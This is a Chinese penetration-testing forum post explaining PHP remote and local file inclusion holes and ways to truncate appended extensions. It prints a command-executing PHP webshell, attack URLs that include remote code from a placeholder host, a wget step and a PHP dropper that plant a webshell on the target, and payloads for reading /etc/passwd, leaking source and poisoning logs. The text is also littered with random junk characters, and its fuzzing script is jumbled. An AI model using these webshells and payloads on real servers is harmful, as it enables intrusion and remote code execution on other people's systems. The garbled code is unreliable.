中国网络渗透测试联盟

标题: PHP文件包含漏洞详解(包含截断方法) [打印本页]
作者: admin    时间: 2013-4-19 19:07
标题: PHP文件包含漏洞详解(包含截断方法)
一、什么才是”远程文件包含漏洞”?; A8 d  x# G  o( a7 z' \- |8 z

3 w4 _1 b% U" ]回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。6 G7 H8 w9 t5 A' o

6 q, K* P9 A: F, z1 ]6 i- E$ {涉及到的危险函数:include(),require()和include_once(),require_once()
  H- f* V* z$ W2 }& I5 B( h  R  v9 h! ?# I4 m$ L
Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。
) {- N5 O1 M4 N8 `( n$ F2 K$ ERequire:跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。
, |) c7 _  h" q6 O2 UInclude_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。+ A0 T! X, T9 T: P( @
Require_once:这个函数跟require的区别 跟上面我所讲的include和include_once是一样的。所以我就不重复了。3 o- D- R2 J- h. p" p: y
" D/ |, u0 F6 X  O0 O! W- h; P) `
php.ini配置文件:allow_url_fopen=off 即不可以包含远程文件。Php4存在远程&本地,php5仅存在本地包含。" G/ h4 V! t$ S2 o5 E- o1 h' ?

$ n" x! z0 y( I* O二、为什么要包含文件?1 n/ w- x0 ?/ I0 h; w
. p4 ^+ ]& f( H, x/ p
程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比 如 share.php,而后在其它文件进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想 在 main.php里包含share.php,我将这样写include(“share.php”)就达到目的,然后就可以使用share.php中的 函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢?$ `0 D* E  @  B9 v2 |# z
* x" i+ E2 a3 h3 K3 T3 C, I
有的时候可能不能确定需要包含哪个文件,比如先来看下面这个文件index.php的代码:* a; T& ]* N- O' s" k9 l0 r

. Z, _* F6 ^: ]4 \9 [if ($_GET) {
2 u: U2 o- n/ {9 c        include $_GET;
! x4 E' @& E. o0 ?# |% ]} else {0 q" m% s7 g% ^
        include ”home.php”;+ ]. l) ]( C( k- K9 n
}( Q2 r* }9 ?$ A9 w5 m3 V
. t$ I2 V# b7 m! ]* ~* S
很正常的一段PHP代码,它是怎么运作的呢?
7 }( Z7 B! W  v4 {0 P8 Q* K9 b2 c" F, h! [0 q8 V0 N
上面这段代码的使用格式可能是这样的:; H( c# a7 m0 e  ]) [) Y' x
2 n6 O0 K- |# @( Z. }) c# {
http://hi.baidu.com/m4r10/php/index.php?page=main.php或者7 X  n* T( ?$ _# Y
http://hi.baidu.com/m4r10/php/index.php?page=downloads.php5 d, y$ \: ^' H8 g

( L" s* Q# H6 t" A& m( P. B$ _结合上面代码,简单说下怎么运作的:
$ I. h6 c' N' ]6 Z; t8 z
1 A8 ~: o. B2 z: u% ^0 n; D# }  x1.提交上面这个URL,在index.php中就取得这个page的值($_GET)。
6 y/ X; |9 `6 ^0 O  s2.判断$_GET是不是空,若不空(这里是main.php)就用include来包含这个文件。) {! l6 u& y- ]0 {# K! r/ i# d
3.若$_GET空的话就执行else,来 include ”home.php” 这个文件。
7 _; b- g* t. I1 g% e' j% [) }) o/ a# h  A1 w7 ^3 D- ?
三、为什么会产生漏洞?. W. B6 u9 z- ^. M
0 K7 O' N" V  n& w8 H  j
你也许要说,这样很好呀,可以按照URL来动态包含文件,多么方便呀,怎么产生漏洞的呢?问题的答案是:我们不乖巧,我们总喜欢和别人不一样,我们 不会按照他的链接来操作,我们可能想自己写想包含(调用)的文件,比如我们会随便的打入下面这个URL:http: //hi.baidu.com /m4r10/php/index.php?page=hello.php。然后我们的index.php程序就傻傻按照上面我们说得步骤去执行:取 page为hello.php,然后去include(hello.php),这时问题出现了,因为我们并没有hello.php这个文件,所以 它 include的时候就会报警告,类似下列信息:  ?% c4 }" F/ ~

7 W9 ^) c- x$ k0 r" hWarning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
' M+ q- ?- [9 p- e* yWarning: include() [function.include]: Failed opening ’hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3
! P, f+ H  t" V2 y$ k* d+ [0 j& X, s: k2 i: F
注意上面的那个Warning就是找不到我们指定的hello.php文件,也就是包含不到我们指定路径的文件;而后面的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。0 J/ B& i; ^0 e+ c: J7 \8 }

3 k9 f1 i+ ^& B0 T/ ]) y" E四、如何利用?4 U) f8 s: Q0 C9 [% Y

% B/ j* L! r8 y# V, x上面可以看到,问题出现了,那么我们怎么利用这样的漏洞呢,利用方法其实很多,但是实质上都是差不多的,我这里说三个比较常见的利用方法:
- ]7 A! j# r6 D. ~+ V$ {: H4 w4 H  D6 |9 b3 V
1.包含读出目标机上其它文件
+ M" W' X3 y# R( a* N9 n9 {4 R9 I
0 V5 p* p1 ?8 o( ^由前面我们可以看到,由于对取得的参数page没有过滤,于是我们可以任意指定目标主机上的其它敏感文件,例如在前面的警告中,我们可以看到暴露的绝对路径(vhost/wwwroot/php/),那么我们就可以多次探测来包含其它文件,比如指定URL为:http://hi.baidu.com /m4r10/php/index.php?page=./txt.txt可以读出当前路径下的txt.txt文件,也可以使用../../进行目录跳转 (在没过滤../的情况下);也可以直接指定绝对路径,读取敏感的系统文件,比如这个URL:http://hi.baidu.com/m4r10 /php/index.php?page=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动Apache的权限比较高,是可以读出 这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect.的Warning(这里是由于apache的open_basedir中限制了访问目录)。/ N9 U& ^7 X  u  i) K' f! M! m
" h" I  `( s4 X* c; G& U
2.远程文件包含可运行的PHP木马
& P- p8 K9 `2 ?8 u1 }+ Y" O. t: b
$ w* ?% \6 }' g- l& P如果目标主机的”allow_url_fopen”是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为 PHP格式就可以了)。
- R; I9 H8 ^4 n- y. {5 q0 X6 o& _: V% z0 g6 q3 r1 i
if (get_magic_quotes_gpc()){/ ^" ]5 R" H( `& F
        $_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)" r+ X& |% T+ N' H
        ini_set(“max_execution_time”,0); //设定针对这个文件的执行时间,0为不限制.
- ~* u/ X0 E0 Y* X) l$ T: j1 v        echo ”M4R10开始行”;       //打印的返回的开始行提示信息# @( t3 l+ [+ o# R8 s+ [0 k/ x
        passthru($_REQUEST["cmd"]);   //运行cmd指定的命令( G6 X/ v5 ]3 g: a$ L
        echo ”M4R10结束行”;       //打印的返回的结束行提示信息
1 n( N4 @! o5 v3 q+ l9 K, H2 Y?>3 T7 S1 d  r% D- v, [3 v
; _5 a# D! R! k8 Q, r% V
以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在M4R10开始行与M4R10结束行之间。把这个文件 保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了:
3 E( K% j% l4 h5 V
* R+ ?) S, K/ Lhttp://hi.baidu.com/m4r10/php /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls+ a. i. O8 S' o& N

. v: C- S7 G6 H5 l0 ~+ P其中cmd后面的就是你需要执行的命令,其它常 用的命令(以*UNIX为例)如下:! D- f3 q' f& T, k! `+ C

0 Y. s4 }' G6 s0 W* R' g5 X9 Hll 列目录、文件(相当于Windows下dir); ]5 T- y1 s  r" J
pwd 查看当前绝对路径
: g  U9 ~8 j& @% ^id whoami 查看当前用户) ]2 o$ |8 R0 Z9 h( Q/ K; m
wget 下载指定URL的文件
! K4 P6 U% G; k; y1 }" G
: I/ e7 Q1 G* J# U% x( k' Y2 @2 R等等其它的,你主机去BAIDU找吧,就不列举了。" a. B. z" o% B+ l
& Q% C' y3 |7 F$ C# Q2 l1 P. M
3.包含一个创建文件的PHP文件(常用)
/ T3 m  O; i+ @% ]3 B& F0 _, w" D  `& b) }$ v
也许有的人认为还是得到目标机上的一个真实的Webshell比较放心,万一哪天人家发现这儿个包含漏洞修补了,我们就不能再远程包含得到上面的那 个” 伪”Webshell了,不是么?可以理解这个心态,我们继续。得到一个真实的Webshell,我们也说两种常见的方法:
0 ~$ n; |5 _4 i; }% D7 ^2 v6 V* A1 ~- y: s1 n2 U2 m& I* D
1)使用wget之类的命令来下载一个Webshell. ]% V8 p. u! v4 f
# c, _9 F; Y0 Z. x% Z
这个比较简单,也很常用,在上面我们得到的那个伪webshell中,我们可以执行命令,那么我们也可以调用系统中的一个很厉害的角色,wget, 这个命令的强大你可以google下,参数一大堆,绝对搞晕你,呵呵,我们不需要那么复杂,我们就使用一个 -O(–output- document=FILE,把文档写到FILE文件中) 就可以了,呵呵。
0 E2 z( |5 z9 V% x7 F* q; s1 v3 W* m
前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方,比 如:http://www.xxx.cn/m4r10.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中 执行如下的URL:$ ?- I1 }- t3 f3 H( g& e$ ]
7 t, t; c: E' w  Q  _
http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn /cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php7 O* \" p7 W9 e0 G. l+ W

% c9 T& I3 C; K) ?& Z3 ~) E如果当前目录可写,就能得到 一个叫做m4r10.php的Webshell了,如果当前目录不可写,还需要想其它的办法。0 |' m- l5 c( {' q$ G, l
/ D# s( p8 ^. h; r9 i8 D& f
2)使用文件来创建  Q+ N# ]) g8 M) E7 |
: ?6 q; P& ?5 _
前面的wget可能会遇到当前目录不能写的情况;或者目标主机禁用了(或者没装)这个命令,我们又需要变通一下了,我们可以结合前面的包含文件漏洞来包含一个创建文件(写文件)的PHP脚本,内容如下:
0 L+ A& Y3 M* }6 g: z3 O: z
# U) P& _$ B! m0 m- m6 O<?php* r! r" H$ M* Y1 w) o
$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流5 ~  W, D7 ^$ P; u0 l
$ff=fopen(“./upload/m4r10.php”,”a”);     //寻找一个可以的目录,创建一个文件
- O3 d% A2 u. p1 t4 P# j2 _# vfwrite ($ff,$f);  //把前面打开的文件流写到创建的文件里2 O& o# V8 c7 D$ K
fclose($ff);    //关闭保存文件) ~& B/ d& }1 U% ^3 ^
?>% _, E, L5 C; ?* n/ ~6 v
0 y2 v/ [1 u: a6 F8 G* I3 |% N
还是写入我们上面用wget下载的那个php文件,但是我们改进了方法,用PHP脚本来实现,可以使用上面的cmd.php?cmd=ll查找可以 写的目录,比如这里的upload,然后把文件创建在这个目录下:./upload/m4r10.php。然后就得到我们的Webshell了。
, ?4 j5 q% U7 j- `0 l. A! F& r" k) h6 D  ]" g
4.本地文件包含(常用)
, K, P, L  I& @0 V& [. m3 d
3 B8 |7 [6 Y0 m8 C7 Q3 F( l典型的漏洞代码:
5 v- @6 n% g0 D* Q
! c4 V: A: `9 r7 Y# q<?php2 h$ ]9 J8 t% r- L$ ?
include($_GET['pages'].‘.php’);
4 I" P- Z8 W0 L: u, _0 O3 {6 L! W?>
0 V9 m0 K3 x5 ]1 Z6 w; p9 T, i4 h/ O) Q+ }/ k4 i9 [' z5 J
黑盒判断方法:
; D! D6 {! f) D, d5 m单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
0 m: M8 Q  E3 b+ f; _, }6 R
3 Z/ V; `5 j3 w, [本地包含漏洞的利用(这里先忽略截断问题,下面会将截断的方法)& I# k5 H1 _- {9 m) G; k. {/ l
9 a% V9 \* p" x5 U) I
1、包含同服务器中上传的jpg、txt、rar等文件,这个是最理想的情况了。- V& E) z: ?7 B) ?$ I# N& Q) y" j

& ^) M0 u# X  x. C4 W) V3 s9 [2、包含系统的各种日志,如apache日志,文件系统日志等 其中apache当记录格式为combined,一般日志都会很大,基本无法包含成功。包含log是有自动化攻击程序的。
' q7 U- h$ N& k/ ~7 f其中鬼子的博客中有提到一个空格的问题。见4 F4 @. Q. f8 Y- p- b. _
《邪恶的空格-PHP本地文件包含漏洞的新突破口》
- k& l+ X4 r" i8 q6 ^: dhttp://huaidan.org/archives/1144.html
, C) n! l& H* N( Q, E) \, ^! X3 }! R解决空格问题其实把一句话base64加密后再写入就可以执行了。5 R. q8 s4 x% h

- R3 Y# ?* Y5 ^" r& I$ Y; T3 K  f3、包含 /proc/self/environ . 这个环境变量有访问web的session信息和包含user-agent的参数。user-agent在客户端是可以修改的。参考:) U! @/ V0 ^- H2 N; s7 o3 `  r+ k" J
《Shell via LFI – proc/self/environ method》% R9 f7 l# [' b% `" X, J) r4 i
http://hi.baidu.com/root_exp/blo ... 42664fd7887d7d.html  
+ C$ b  ~2 m! e7 X
# n- t, o+ Q# e1 B9 B4、包含由php程序本身生成的文件,缓存、模版等,开源的程序成功率大。
  v$ d- Q% Q/ y& J* ^5 q' ^8 V9 P
5、利用本地包含读取PHP敏感性文件,需要PHP5以上版本。如看到“config”的源码如下' ~8 _# i6 u* u6 z: y! ]! F
index.php?pages=php://filter/read=convert.base64-encode/resource=config
# Z; q8 a6 c9 }: i# Y特别的情况用到readfile() 函数不是包含执行,可以直接读源码。5 }( b3 N& k# E0 h
+ X: N; O5 r5 s- P4 m; F
6、利用phpinfo页面getshell。一般大组织的web群存在phpinfo的机会挺大的。6 ^. I6 v! e. n- f
poc和介绍参考:
5 f7 t, }$ i# z6 q7 B# w( Y/ z$ w《利用phpinfo信息LFI临时文件》' p; [5 w+ U" Y) N' z. L9 C
http://hi.baidu.com/idwar/blog/item/43101de153370126279791f2.html
0 O& P$ a1 ?% Y$ I
3 B* M1 ~  n( V1 A7、利用包含出错,或者包含有未初始化变量的PHP文件,只要变量未初始化就可能再次攻击 具体见:& ^" E8 b0 i+ M
《include()本地文件包含漏洞随想》: U0 R$ y% l2 A' w1 X9 }, o
http://www.2cto.com/Article/200809/29748.html
4 j; L% X1 i& R3 @2 A1 v  O8 }2 c# a8 u  q
8、结合跨站使用
: @- p9 ^1 `& L! Yindex.php?pages=http://127.0.0.1/path/xss.php?xss=phpcode (要考虑域信任问题)3 l8 e4 i3 G6 q" E8 q

# l: ]0 o$ v4 z/ M! u* ~4 ?9、包含临时文件文件。这个方法很麻烦的。参考:
8 M2 J7 @) r3 ]. q( d《POST method uploads》6 |" L! V) R8 ]0 s
http://www.php.net/manual/en/features.file-upload.post-method.php
5 s2 U5 I4 z' E) ^9 l; U# V9 _. ~8 o解决临时文件删除方法:慢连接 (注:前提是 file_uploads = On,5.3.1中增加了max_file_uploadsphp.ini file_uploads = On,5.3.1中增加了max_file_uploads,默认最大一次上传20个)- e# W# p! i0 Z
windows格式:win下最长4个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′)如: c:/windows/temp/php3e.tmp7 f$ T( ]4 d' d
linux格式:6个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′) 如:/tmp/phpUs7MxA
, T! @& i% l! l( ^慢连接的两种上传代码参考:
: B  r" M, [5 p! a7 J8 x《PHP安全之LFI漏洞GetShell方法大阅兵》
; c0 e9 H) t1 G4 |http://www.myhack58.com/Article/html/3/62/2011/32008_2.htm    H1 b# ?7 f+ k1 {9 m  d0 X

7 [. V$ Z3 n- I10、当前实在找不到写权限目录时候,注入到log中再寻找写权限目录。如注入到log.8 L, [' J6 |/ I, g+ U
Linux: index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname( P/ q  l' w# W1 a) j7 @! [
windows: index.php?pages=..\apache\logs\error.log%00&x=.&y=dir  I0 B7 w$ ]2 i4 B
具体参考《PHP本地文件包含(LFI)漏洞利用》
0 w3 d( ~( [% O. M" J' q2 Y: Mhttp://kingbase.org/blog/php_local_file_inclusion_exploit. w, o3 m5 Z3 M8 K0 M0 j2 N
: V& `6 ~# @  O, m  S
11、使用php wrapper例如php://input、php://filter、data://等包含文件 在《PHP 5.2.0 and allow_url_include》//http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html 其中文中提到的allow_url_fopen和allow_url_include只是保护了against URL handles标记为URL.这影响了http(s) and ftp(s)但是并没有影响php或date 这些url形式。' Z1 k8 I4 e. q' }6 Y% u
12、LFI判断目录是否存在和列目录,如
' @! c2 @, N. n**index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
# @* E( n, T( m5 g5 Z1 R**这个方法在TTYshell上是可以完全是可以判断的,但是在URL上有时候不可行。即使不存在dossierexistant也可以回显passwd内容。, r9 J" u, s) V" A
index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00# {/ z) e' e6 h
**FreeBSD 《directory listing with PHP file functions》http://websec…ress.com/2009 … php-file-functions/ 列目录
# S& B  B+ g6 L& F6 F$ Q/ Y" ]**存在逻辑判断的时候,如不存在该目录就会返回header.php+File not found+footer.php 存在就会返回header.php+footer.php。这种逻辑很符合程序员的习惯。曾经用找到了一个目录很深的日志获得shell。
" @/ t, R; L# G  Z3 k
$ K9 |: {, b2 |7 z3 d$ [  A13、包含SESSION文件,php保存格式 sess_SESSIONID 默认位置是/tmp/(PHP Sessions)、/var/lib/php/session/(PHP Sessions)、 /var/lib/php5/(PHP Sessions) 和c:/windows/temp/(PHP Sessions)等文件中。
. ^0 f2 G; @4 b( I* z' E& F4 o  R( ?
14、包含 /proc/self/cmdline 或者/proc/self/fd/找到log文件 (拥有者为root,默认情况要root才能访问)9 u8 x  Z0 E$ X. v5 A6 u
具体参考:! c" d0 s: V) e2 Y: g# ?
Local File Inclusion – 《Tricks of the Trade》
4 c8 V% k1 y! i6 Ihttp://labs.neohapsis.com/2008/0 ... ricks-of-the-trade/  
) J, F1 ]7 F$ }1 ?还有其他提到包含/var/log/auth.log的,但是这个文件默认情况也是644.
7 z8 g0 m# Z' {! ]  g) p6 U# F( T* D- I7 j1 u  u. P0 q/ c, {5 d; K
15、包含maillog 通常位置/var/log/maillog 这个方法也很鸡肋,具体参考:; m2 V$ }0 I) {6 C7 ^9 G
《local file inclusion tricks 》2 W8 e- r7 D, _% E0 A& R- E! S
链接找不到了+ t! V+ j2 _- d: r1 h- X

* z+ i; ]  r) a. S1 q( A; n5 _16、包含固定的文件,非常鸡肋,为了完整性也提下。如,可用中间人攻击。
( |1 }/ O! ^; i4 L1 ^2 Q# U
6 [5 O6 C3 `; f6 r9 X6 {  @; N突破限制截断后面的字符串技巧
4 Y8 N5 V, g5 w9 J$ W/ F' o
3 [2 V7 K  w  C9 u利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?
' ], Z3 D; ?+ F, X4 b
7 y2 T0 K" @% ~- d/ }$ G用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用)* R  ~, F) U% B0 d$ Y! Z9 E; e

; a3 \  N: @3 {! H( B' u5 m看漏洞代码:
* ?3 Z. i4 M( y$ T, k' c! T0 f+ Y, |* K* E/ D
<?php
% d. U. d& H$ @$webpath = dirname(__FILE__)."/";7 G: r& h& X$ b! k. ~
$filepath = "test.txt";
7 c+ D3 x' j  H9 H% Ofor($i =1;$i<1000;$i++){4 P7 g6 v1 @/ ^3 {! b0 k: V1 @0 K
$filepath .= '.';5 W' x0 {  h8 V" B5 g! H- a
}3 s2 @! j& P# I( I/ `; f: G7 e
include  $webpath.$filepath.".php";
1 O! u/ d" _- N& m?>+ Y: v; S& ~, a! f+ ]9 {5 D
test.txt 代码:<?php die('OK');?>3 S; N6 w4 }" d% ?( U
7 {5 C2 f% D5 J/ w" @# I, ~
结果截断失败,改下代码:
9 K# [, \1 M) ?+ L. S; Q8 h5 i5 ~9 W- l5 n
<?php, w/ _5 j5 L2 h) |) @1 Q) X! W
$webpath = dirname(__FILE__)."/";) R, X: E9 m( m; n. X# O7 u- c
$filepath = "test.txt";+ j( @2 ?; p& ^. k! R
for($i =1;$i<1000;$i++){
' u& E9 V( ]3 C+ B$filepath .= '.';
/ f' \4 B& c, v' W) b}. z% r6 i# z+ L% C  L; M
include    $filepath.".php";  //相对路径$ U( z1 ]* k3 q4 l# R
?>+ R2 t$ n' t1 z
0 t5 ]1 H5 N: z2 ^
这次成功。8 e! N% }6 R5 H
4 z( q5 f. a8 P
以上是windows下的方法,其实linux也可以:
! C7 {8 M- J1 P$ _$ T- F
- K; @' {( W' h# U3 B/ y9 S6 V<?php
$ u; z# |, O% y5 A) f7 X$a='';- P5 z: W5 @" m$ D2 @
for($i=0;$i<=4071;$i++) {# V" }$ t! @* i
$a .= '/';/ g3 a& w9 P# r
}0 J. A0 R& k/ U, n% p! k
$a = 'test.txt'.$a;                //完整的路径为/var/www/test/test.txt
- g& A: D2 I  b& I0 Y% ~1 Drequire_once($a.'.php');: n. B8 A; s' Q* U, ^
?>
+ |# Q. z& l. y, c6 k) `. _* p3 l: K3 Q9 ~
include截断
- }, z# t' W; u$ R  ~- v% u& i3 {6 a<?php
5 b+ X" A( ?: e, a3 T5 U. Kinclude $_GET['action'].".php"; ?>提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”,但是除了“%00”还有没有其他的字符可以实现截断使用呢?
  Y% w+ I! o2 D, Y& Y* B
: ~1 n3 {) w: ]. ]4 x4 u肯定有人想到了远程包含的url里问号“?”的作用,通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”:),好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下:
1 M' I- l, M; k7 O/ X" H* M
2 [( Z* s5 m% ^# B$ A3 V# r5 I; M
$ T% G  K6 g" @! ?* x$ y9 o<?php////////////////////////var5.php代码:////include $_GET['action'].".php"; ////print strlen(realpath("./"))+strlen($_GET['action']);  ///////////////////ini_set('max_execution_time',
* X; ^% _! N; ~) |" f5 y. e                        0);$str='';for($i=0;$i<50000;$i++){        $str=$str."/";        $resp=file_get_contents('http://127.0.0.1/var/var5.php?action=1.txt'.$str);        //1.txt里的代码为print 'hi';        if. @: m! ]% }" g$ x/ k
                        (strpos($resp,
, P" I4 \$ A6 v6 ?1 ?                        'hi')
. E3 i4 ?- S9 \% T  D                        !==; m: e( R3 {& V4 ?
        经过测试字符“.”、“ /”或者2个字符的组合,在一定的长度时将被截断 win系统和*nix的系统长度不一样,当win下strlen(realpath("./"))+strlen($_GET['action'])的长度大于256时被截断,对于*nix的长度是4 * 1024 = 4096。 对于php.ini里设置远程文件关闭的时候就可以利用上面的技巧包含本地文件了。(此漏洞由cloie#ph4nt0m.org最先发现])                false){                print $i;                exit;        }}?>5 t6 W# A4 r+ @9 O5 Y+ k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2